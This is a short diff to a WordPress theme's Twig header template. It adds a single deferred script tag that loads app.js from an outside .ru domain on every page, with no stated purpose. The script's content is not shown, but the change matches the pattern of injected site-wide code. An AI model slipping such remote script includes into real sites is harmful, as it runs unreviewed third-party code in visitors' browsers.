--- a/views/html-header.twig
+++ b/views/html-header.twig
@@ -12,4 +12,5 @@
     <link rel="author" href="{{ site.theme.link }}/humans.txt" />
     <link rel="pingback" href="{{ site.pingback_url }}" />
     <link rel="profile" href="http://gmpg.org/xfn/11">
+    <script src="https://res.smartwidgets.ru/app.js" defer></script>
     {{function('wp_head')}}
